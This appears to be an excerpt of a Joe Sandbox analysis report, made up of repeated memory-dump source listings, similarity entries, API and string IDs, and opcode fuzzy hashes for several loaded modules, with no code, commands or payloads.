                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
• Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
• Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
• Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: 335d1d3817ec4d55ff377caf703831ab7f6be45e12ce3a8728bfb007799e5078
                                                                                                                                                  • Instruction ID: f8a0dd6171220db080a4657ebd17450e0e66495399d2f8a7f6c1ca997e4d1760
                                                                                                                                                  • Opcode Fuzzy Hash: 335d1d3817ec4d55ff377caf703831ab7f6be45e12ce3a8728bfb007799e5078
                                                                                                                                                  • Instruction Fuzzy Hash: 4EF096A260870682E6628F48BC807756354BF457E5F48027AEF4D4A6A0EF3EDA899300
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: 29437ac4afbfda1d0549fadbdcd205bb5e1de10d9f53cd31b8a2290d1309ccbd
                                                                                                                                                  • Instruction ID: 74429e1f76944a5e09356b704ab23aa6a6212c393a85389d950b6235482401ca
                                                                                                                                                  • Opcode Fuzzy Hash: 29437ac4afbfda1d0549fadbdcd205bb5e1de10d9f53cd31b8a2290d1309ccbd
                                                                                                                                                  • Instruction Fuzzy Hash: 39F09662A1878642E5528F18F8403756254FF447E4F198236DF4D87690EF2CF989F700
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: cace5ebabb9363b8966dec080f45c5113ce0fff2ffdb2ee5c196495c6adaa64c
                                                                                                                                                  • Instruction ID: 4a759241da14da64db076c28c99972bda0f9c313e3dd72f4964756aec9ee2d21
                                                                                                                                                  • Opcode Fuzzy Hash: cace5ebabb9363b8966dec080f45c5113ce0fff2ffdb2ee5c196495c6adaa64c
                                                                                                                                                  • Instruction Fuzzy Hash: 80F09062A1878A82E5528F18B8403B96254FF457E4F598236EF4D87690EF2CF989E700
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: 94c313a93f3fcc94334b073feae1166a67dda0c898543ef0da23008a7acd5d45
                                                                                                                                                  • Instruction ID: 3aec7a6c73b3824081ee5b6c46e0b6d8796d8e6b23bdcbb4fede6599e1dd3204
                                                                                                                                                  • Opcode Fuzzy Hash: 94c313a93f3fcc94334b073feae1166a67dda0c898543ef0da23008a7acd5d45
                                                                                                                                                  • Instruction Fuzzy Hash: 02F09062A1878A82E5528F18FC403B96254FF457E4F598236EF4D87690EF2CF989A700
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: a6dc7d9a45d4f0885938b8d6bee443f9b6c71ed4e1913be312bb925606633a80
                                                                                                                                                  • Instruction ID: ba3e34913068421b90eb1d7be8f986b3289a8f101b106263f7b56e494a9a344a
                                                                                                                                                  • Opcode Fuzzy Hash: a6dc7d9a45d4f0885938b8d6bee443f9b6c71ed4e1913be312bb925606633a80
                                                                                                                                                  • Instruction Fuzzy Hash: C6F09062A1878A82E5528F18B8403B96254FF457E4F598236EF4D87690EF2CF989E700
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: 43a66c7a40e50f2705813a1cfc1b0f86665661e007711cb612dbde3ccfe57ede
                                                                                                                                                  • Instruction ID: 100a31e855ac35467210143eb3b9aa4aaf5623f089f314565573440b2f2f62bd
                                                                                                                                                  • Opcode Fuzzy Hash: 43a66c7a40e50f2705813a1cfc1b0f86665661e007711cb612dbde3ccfe57ede
                                                                                                                                                  • Instruction Fuzzy Hash: 04F09662A1878642E5538F18BC403796254FF457E4F598236DF4D87690EF2CF985E700
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: 0ca799fca6bbcb1757cbcc2dcca85249b25f476f8fa3a6e87312bd06e934d07b
                                                                                                                                                  • Instruction ID: 3ad469e133cbf741c7e98f467054f27528fef1372f08fb528ad6300068a82333
                                                                                                                                                  • Opcode Fuzzy Hash: 0ca799fca6bbcb1757cbcc2dcca85249b25f476f8fa3a6e87312bd06e934d07b
                                                                                                                                                  • Instruction Fuzzy Hash: 58F0F622A0878642E5538F0CB8803757244BF407E4F494635DF5D46691EF3DD986B300
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: 5aa2f7c8573c3de0365c04b7b97fedeb54286f0fb7594e79099b212bd57f958c
                                                                                                                                                  • Instruction ID: 3cd975793e2593f46408d791bc155c68050fe39c0051fd6262389bd36191b347
                                                                                                                                                  • Opcode Fuzzy Hash: 5aa2f7c8573c3de0365c04b7b97fedeb54286f0fb7594e79099b212bd57f958c
                                                                                                                                                  • Instruction Fuzzy Hash: E3F0F022A0868642E6538F0CBC803B97244BF407E4F49463AEF5D46691EF3DDA8AB300
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: b64ba499165d0bf9f2a6abbdea868e445e23a4ee5814657b89a818d1230dab7a
                                                                                                                                                  • Instruction ID: acbda8544bbe563e28de5675648f70b184f3252f1e5b5923a141e5ae3e835372
                                                                                                                                                  • Opcode Fuzzy Hash: b64ba499165d0bf9f2a6abbdea868e445e23a4ee5814657b89a818d1230dab7a
                                                                                                                                                  • Instruction Fuzzy Hash: F5F0F622A0878642E5538F0CBC803757244FF407E4F494536DF5D46691DF3DDA86B300
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: b925a896082f3cbac8f85682289c0623576caa08c1e2f56db9f14118f2be1eb2
                                                                                                                                                  • Instruction ID: b0d9de61a816731c9345bbd97bc40bc011f2dbb4d13bec58fe18848e7f7ef728
                                                                                                                                                  • Opcode Fuzzy Hash: b925a896082f3cbac8f85682289c0623576caa08c1e2f56db9f14118f2be1eb2
                                                                                                                                                  • Instruction Fuzzy Hash: 39F0F622A0878642E5538F0CB8803757244BF407E4F494536DF5D46691DF3DD986B300
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: 56f8f947741124c32929831f6305df564f095b6d9a6d9a0b39bb5ff756825751
                                                                                                                                                  • Instruction ID: d163a41e2158c5c0ca51e3a5e43e51b2ad2e369288e8e6a8c2261f9dc8896303
                                                                                                                                                  • Opcode Fuzzy Hash: 56f8f947741124c32929831f6305df564f095b6d9a6d9a0b39bb5ff756825751
                                                                                                                                                  • Instruction Fuzzy Hash: C4F09662A0878642E6538F0CB8807757255BF407E4F494635DF5D46695DF3DD98AB300
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158612916.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158658328.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158682587.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158717664.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158748673.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158773276.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: e0851725d79fa95748260dbe6cd32e6c1aaac29318307fe0d0a66a5108b9946e
                                                                                                                                                  • Instruction ID: 245565dd909de259445d6a175790bd5f1e4e4d6fbed27ea345bc81cd26c0e710
                                                                                                                                                  • Opcode Fuzzy Hash: e0851725d79fa95748260dbe6cd32e6c1aaac29318307fe0d0a66a5108b9946e
                                                                                                                                                  • Instruction Fuzzy Hash: 14F09062A0874A52F6528F88F9507B97354BF447E4F480236EF5D46A90EF3DE9999300
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158612916.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158658328.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158682587.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158717664.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158748673.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158773276.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: be87ca2da0906a4b563e4e802efae5fe8a631e34ae087ba0a1cce180adca3898
                                                                                                                                                  • Instruction ID: c30fd3d5ff122b2e3da23e97c3b6e3aefb9d3525ce11ba51b10938096c705d9a
                                                                                                                                                  • Opcode Fuzzy Hash: be87ca2da0906a4b563e4e802efae5fe8a631e34ae087ba0a1cce180adca3898
                                                                                                                                                  • Instruction Fuzzy Hash: 68F09062A0874A52F5528F88B9507B9B354AF447E4F480236EF5D46A90EF3DE9999300
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158612916.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158658328.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158682587.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158717664.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158748673.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158773276.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: 43db66ee65da957a1449361e24969b174e734d57be6334d49a96190eb8423e72
                                                                                                                                                  • Instruction ID: b336394e2dc9d79598424f183d468c56f0e70399b5b51cb1ca8cb4cf78a4fcf7
                                                                                                                                                  • Opcode Fuzzy Hash: 43db66ee65da957a1449361e24969b174e734d57be6334d49a96190eb8423e72
                                                                                                                                                  • Instruction Fuzzy Hash: 01F09062A0874A52F5528F88B9507B97358AF447E4F480236EF5D46690EF3DEA999300
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158612916.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158658328.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158682587.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158717664.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158748673.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158773276.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
